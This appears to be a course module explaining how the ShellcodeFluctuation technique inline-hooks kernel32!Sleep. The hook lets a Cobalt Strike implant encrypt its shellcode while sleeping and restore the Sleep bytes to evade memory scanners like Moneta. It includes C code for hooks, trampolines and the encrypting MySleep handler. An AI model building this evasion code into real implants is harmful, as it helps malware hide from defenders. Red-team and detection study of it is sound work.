Module 4: Sleep Function Hooking
How ShellcodeFluctuation intercepts kernel32!Sleep via inline hooking to gain control before and after the implant sleeps.
Module Objective
Understand how inline function hooking works, why ShellcodeFluctuation hooks kernel32!Sleep specifically, the trampoline mechanism for calling the original function, the MySleep handler architecture, and why the hook is temporarily removed during the actual sleep call.
1. Why Hook Sleep?
Cobalt Strike Beacon (and most C2 implants) calls kernel32!Sleep to pause between check-ins. This is the natural interception point for ShellcodeFluctuation because:
Sleep as the Interception Target
- Guaranteed to be called — every beacon cycle includes a sleep. The implant cannot avoid calling it
- Called from within the implant — the call originates from the shellcode itself, so hooking Sleep intercepts at exactly the right moment
- Single point of control — one hook gives control over every transition between active and idle states
- Natural boundary — Sleep marks the exact moment when the implant transitions from "doing work" to "waiting" — the ideal time to encrypt
- Known function signature —
void WINAPI Sleep(DWORD dwMilliseconds)has a single parameter, making it easy to wrap
2. Inline Hooking vs IAT Hooking
There are two primary approaches to hooking a Windows API function. ShellcodeFluctuation uses inline hooking:
| Method | Mechanism | Pros | Cons |
|---|---|---|---|
| IAT Hooking | Modify the Import Address Table entry for Sleep to point to the hook function | No code modification; works with the PE loader | Only affects imports through the hooked module's IAT; does not catch calls from other modules or via GetProcAddress |
| Inline Hooking | Overwrite the first bytes of kernel32!Sleep with a JMP to the hook function | Catches ALL calls to Sleep regardless of how they are resolved | Modifies mapped DLL code (triggers copy-on-write); must save original bytes for trampoline |
ShellcodeFluctuation uses inline hooking because Cobalt Strike Beacon resolves Sleep via GetProcAddress at runtime, bypassing the IAT entirely. An IAT hook would never intercept the call.
3. Inline Hook Mechanics
An inline hook replaces the first instructions of the target function with a jump to the hook handler. The original instructions are preserved in a "trampoline" so the original function can still be called.
// kernel32!Sleep original bytes (x64):
// 48 89 5C 24 08 mov [rsp+8], rbx
// 57 push rdi
// 48 83 EC 40 sub rsp, 0x40
// ...
// After inline hook installation:
// E9 XX XX XX XX jmp MySleep ; 5-byte relative jump
// 57 push rdi ; leftover byte (unreachable)
// 48 83 EC 40 sub rsp, 0x40
// ...
Hook Installation Steps
- Resolve target address — get the address of
kernel32!SleepviaGetProcAddress - Save original bytes — copy the first N bytes from the function prologue (enough for the JMP instruction)
- Make writable —
VirtualProtectthe target page toPAGE_EXECUTE_READWRITE - Write JMP — overwrite the first bytes with a relative or absolute JMP to
MySleep - Restore protection —
VirtualProtectback toPAGE_EXECUTE_READ - Build trampoline — allocate a small code region containing the saved bytes followed by a JMP back to
Sleep+N
// Simplified inline hook installation
BOOL InstallHook(LPVOID targetFunc, LPVOID hookFunc, LPVOID* trampoline) {
const int HOOK_SIZE = 5; // Size of E9 rel32 JMP on x86
// On x64 we may need more bytes for far JMP
// 1. Allocate trampoline
*trampoline = VirtualAlloc(NULL, 64, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// 2. Copy original bytes to trampoline
memcpy(*trampoline, targetFunc, HOOK_SIZE);
// 3. Append JMP back to targetFunc + HOOK_SIZE
BYTE* trampolineJmp = (BYTE*)*trampoline + HOOK_SIZE;
trampolineJmp[0] = 0xE9; // relative JMP
*(DWORD*)(trampolineJmp + 1) =
(DWORD)((BYTE*)targetFunc + HOOK_SIZE - (trampolineJmp + 5));
// 4. Write JMP to hookFunc at target
DWORD oldProt;
VirtualProtect(targetFunc, HOOK_SIZE, PAGE_EXECUTE_READWRITE, &oldProt);
((BYTE*)targetFunc)[0] = 0xE9; // relative JMP
*(DWORD*)((BYTE*)targetFunc + 1) =
(DWORD)((BYTE*)hookFunc - ((BYTE*)targetFunc + 5));
VirtualProtect(targetFunc, HOOK_SIZE, oldProt, &oldProt);
return TRUE;
}
4. The x64 Long-Jump Problem
On x86-64, a 5-byte relative JMP (E9) can only reach addresses within +/- 2 GB of the instruction. Since kernel32.dll and the hook function may be more than 2 GB apart in the 64-bit address space, ShellcodeFluctuation may need to use a longer jump sequence:
// Option 1: Relative JMP (5 bytes) - works if within 2 GB
// E9 [rel32]
// Range: +/- 2,147,483,647 bytes
// Option 2: Absolute indirect JMP (14 bytes) - works anywhere
// FF 25 00 00 00 00 jmp [rip+0]
// XX XX XX XX XX XX XX XX ; 8-byte absolute address
// ShellcodeFluctuation approach:
// Uses 14-byte absolute JMP when the hook function is
// more than 2 GB from the target
void WriteAbsoluteJmp(BYTE* target, LPVOID destination) {
// FF 25 00 00 00 00 = jmp qword ptr [rip+0]
target[0] = 0xFF;
target[1] = 0x25;
*(DWORD*)(target + 2) = 0; // RIP-relative offset = 0
*(UINT64*)(target + 6) = (UINT64)destination;
// Total: 14 bytes
}
Byte Count Matters
The number of original bytes overwritten must align with instruction boundaries. Overwriting the middle of an instruction creates invalid code in the trampoline. Tools like a length-disassembly engine (LDE) are used to calculate the exact number of bytes to copy, ensuring complete instructions are preserved.
5. The MySleep Handler
The hook redirects all calls to kernel32!Sleep to ShellcodeFluctuation's MySleep function. This is the heart of the fluctuation mechanism:
// Global state
LPVOID g_shellcodeBase = nullptr;
SIZE_T g_shellcodeSize = 0;
DWORD g_xorKey = 0;
LPVOID g_sleepTrampoline = nullptr; // Trampoline to original Sleep
// The hook handler - called instead of kernel32!Sleep
void WINAPI MySleep(DWORD dwMilliseconds) {
// Phase 1: ENCRYPT
// Flip shellcode to writable
DWORD oldProt;
VirtualProtect(g_shellcodeBase, g_shellcodeSize,
PAGE_READWRITE, &oldProt);
// XOR encrypt the shellcode region
xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
// Phase 2: SLEEP
// Call original Sleep via trampoline
typedef void (WINAPI* fnSleep)(DWORD);
((fnSleep)g_sleepTrampoline)(dwMilliseconds);
// Phase 3: DECRYPT
// XOR decrypt the shellcode region
xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
// Flip shellcode back to executable
VirtualProtect(g_shellcodeBase, g_shellcodeSize,
PAGE_EXECUTE_READ, &oldProt);
}
// Execution returns to the shellcode, which continues normally
MySleep Execution Flow
Sleep(60000)MySleepFlip to RW
Sleep()Flip to RX
Beacon
6. Why Unhook Before Sleeping
A critical detail in ShellcodeFluctuation's implementation: the inline hook on kernel32!Sleep is temporarily removed before the actual sleep call and reinstalled after waking. This is done to eliminate the "Modified code" IOC in Moneta:
// Improved MySleep with hook/unhook cycle
void WINAPI MySleep(DWORD dwMilliseconds) {
// Phase 1: ENCRYPT
DWORD oldProt;
VirtualProtect(g_shellcodeBase, g_shellcodeSize,
PAGE_READWRITE, &oldProt);
xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
// Phase 1.5: UNHOOK Sleep
// Restore original bytes to kernel32!Sleep
DWORD hookProt;
VirtualProtect(g_sleepFunc, g_hookSize,
PAGE_EXECUTE_READWRITE, &hookProt);
memcpy(g_sleepFunc, g_originalBytes, g_hookSize);
VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);
// Phase 2: SLEEP (with clean kernel32)
Sleep(dwMilliseconds); // Direct call - no hook in place
// Phase 3: RE-HOOK Sleep
VirtualProtect(g_sleepFunc, g_hookSize,
PAGE_EXECUTE_READWRITE, &hookProt);
memcpy(g_sleepFunc, g_hookBytes, g_hookSize);
VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);
// Phase 4: DECRYPT
xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
VirtualProtect(g_shellcodeBase, g_shellcodeSize,
PAGE_EXECUTE_READ, &oldProt);
}
Why This Matters
During the sleep window (when scanners are most likely to scan), kernel32!Sleep contains its original, unmodified bytes. Moneta comparing in-memory kernel32 against the on-disk file will find no differences. The hook is only present during the brief active window when the implant is executing — the same window that is already too short for reliable scanning.
The Persistent IOC
Even with the unhook/rehook cycle, the copy-on-write page persists. Writing to kernel32's .text section (even temporarily) converts the shared page to a private page. Moneta can detect that kernel32 has private pages in its .text section, even if the content matches the on-disk file. However, the IOC message changes from "Modified code" (suspicious) to a weaker working-set anomaly (less suspicious, as legitimate processes can also cause private pages).
7. Hook/Unhook Timing Window
Understanding the exact timing of when the hook is present vs absent is critical for evaluating the technique's effectiveness:
| Phase | Hook Present? | Shellcode State | Duration | Scanner Risk |
|---|---|---|---|---|
| Active execution | Yes | RX + Cleartext | ~100ms | Hook detectable, shellcode scannable (but brief) |
| MySleep entry | Yes | Transitioning | ~microseconds | Minimal |
| After unhook | No | RW + Encrypted | ~60 seconds | Neither hook nor shellcode detectable |
| After rehook | Yes | Transitioning | ~microseconds | Minimal |
| Active execution | Yes | RX + Cleartext | ~100ms | Hook detectable, shellcode scannable (but brief) |
8. Trampoline vs Direct Call
After unhooking Sleep, the implementation can call Sleep directly rather than through the trampoline. This is a cleaner approach because the trampoline is no longer needed once the original bytes are restored:
// Two approaches to calling original Sleep:
// Approach 1: Via trampoline (used when hook stays in place)
// The trampoline contains:
// [original bytes from Sleep prologue]
// [JMP back to Sleep + hookSize]
// This allows calling original Sleep without removing the hook.
// Approach 2: Direct call after unhooking (ShellcodeFluctuation)
// Since we restore original bytes before sleeping:
// 1. Unhook: restore original bytes to kernel32!Sleep
// 2. Call Sleep() directly - it's now unmodified
// 3. Rehook: install JMP bytes again
// Cleaner: no trampoline allocation, no extra executable memory
Approach Comparison
| Factor | Trampoline (hook stays) | Unhook/Rehook (ShellcodeFluctuation) |
|---|---|---|
| Hook visible during sleep? | Yes — kernel32 modified | No — kernel32 clean |
| Extra allocation? | Yes — trampoline is executable private memory | No — original function used directly |
| Complexity | Simpler (one-time setup) | More complex (restore/reinstall per cycle) |
| Performance | Slightly faster (no memcpy per cycle) | Slightly slower (two memcpy per cycle) |
| Stealth | Lower — hook always visible | Higher — hook only visible during execution |
Knowledge Check
Q1: Why does ShellcodeFluctuation use inline hooking rather than IAT hooking for kernel32!Sleep?
Q2: Why is the Sleep hook temporarily removed before the actual sleep call?
Q3: What is the purpose of a trampoline in inline hooking?